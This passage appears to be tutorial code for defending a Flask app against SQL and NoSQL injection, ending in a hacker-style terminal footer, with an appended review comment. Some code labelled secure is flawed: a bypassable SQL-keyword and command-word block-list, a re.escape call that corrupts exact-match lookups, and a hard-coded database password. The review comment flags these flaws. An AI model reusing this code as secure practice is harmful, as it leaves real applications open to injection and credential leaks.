request, jsonify from flask_sqlalchemy import SQLAlchemy from sqlalchemy import text import re app = Flask(__name__) db = SQLAlchemy(app) # ✅ SECURE: Using SQLAlchemy ORM class User(db.Model): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(80), unique=True, nullable=False) email = db.Column(db.String(120), unique=True, nullable=False) @app.route('/user/<int:user_id>') def get_user_secure(user_id): # ✅ SECURE: ORM prevents injection user = User.query.filter_by(id=user_id).first() if user: return jsonify({ 'id': user.id, 'username': user.username, 'email': user.email }) return jsonify({'error': 'User not found'}), 404 # ✅ SECURE: Parameterized queries for complex operations @app.route('/search') def search_secure(): query = request.args.get('q', '') # Input validation if not re.match(r'^[a-zA-Z0-9\s]+$', query): return jsonify({'error': 'Invalid search query'}), 400 # Parameterized query sql = text("SELECT * FROM products WHERE name ILIKE :search_term") result = db.session.execute(sql, {'search_term': f'%{query}%'}) return jsonify([dict(row) for row in result]) # ✅ SECURE: NoSQL injection prevention (MongoDB) def authenticate_user_secure(username, password): import pymongo from bson.objectid import ObjectId # Validate input types if not isinstance(username, str) or not isinstance(password, str): return None # Escape special characters username = re.escape(username) # Use exact match queries user = db.users.find_one({ 'username': username, 'password': hash_password(password) # Always hash passwords }) return user ``` ## **ADVANCED DEFENSE MECHANISMS** ```python # Web Application Firewall (WAF) rules class SQLInjectionFilter: MALICIOUS_PATTERNS = [ r'(\b(union|select|insert|update|delete|drop|create|alter)\b)', r'(\'|\"|\;|\-\-|\#)', r'(\bor\b.*\=.*\=)', r'(\bunion\b.*\bselect\b)', r'(\bexec\b|\bsystem\b|\bcmd\b)' ] @staticmethod def is_malicious(input_string): for pattern in SQLInjectionFilter.MALICIOUS_PATTERNS: if re.search(pattern, 
input_string.lower()): return True return False # Database connection security class SecureDBConnection: def __init__(self): self.connection_string = ( "postgresql://limited_user:secure_pass@localhost:5432/app_db" "?sslmode=require" ) def get_connection(self): # Use connection pooling and least privilege return create_engine( self.connection_string, pool_pre_ping=True, pool_recycle=300 ) ``` ``` > MISSION COMPLETE: Security vectors analyzed > DEFENSE PROTOCOLS: Activated > REMINDER: Use knowledge ethically - CTF challenges only [F1] EXPLOIT_RESEARCH [F2] DEFENSE_MATRIX [F3] CTF_MODE v3.1.42 Penetration Testing Secure Development Ethical Hacking CPU: 23% MEM: 67% NET: 1.2Mbps SECURITY_ENHANCED ``` **Remember**: These examples are for educational purposes and CTF challenges only. Always follow responsible disclosure and ethical hacking principles when discovering vulnerabilities in real systems.
|
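Review bot: the `SQLInjectionFilter` block-list in the added line 2 should not be presented as a defence: `r'(\'|\"|\;|\-\-|\#)'` rejects every name like O'Brien and every string containing `#`, `r'(\b(union|select|insert|update|delete|drop|create|alter)\b)'` rejects any search containing the word "select" or "update", and pattern block-lists of this kind are routinely bypassed with comments, encoding or case tricks that the parameterised `text("SELECT * FROM products WHERE name ILIKE :search_term")` query in the same block already makes unnecessary. Keep the parameterised query and the allow-list check in `search_secure` and drop or caveat the WAF class. `SecureDBConnection` also embeds `limited_user:secure_pass` in source; read the DSN from the environment so a credential never lands in git. The same `re.escape(username)` problem from index.html recurs in `authenticate_user_secure` here: escaping only makes sense if the value is placed inside a `$regex`, and it corrupts an exact-match lookup. Line 1 is shown as removed and re-added with identical text, presumably a trailing-newline change; confirm nothing else differs.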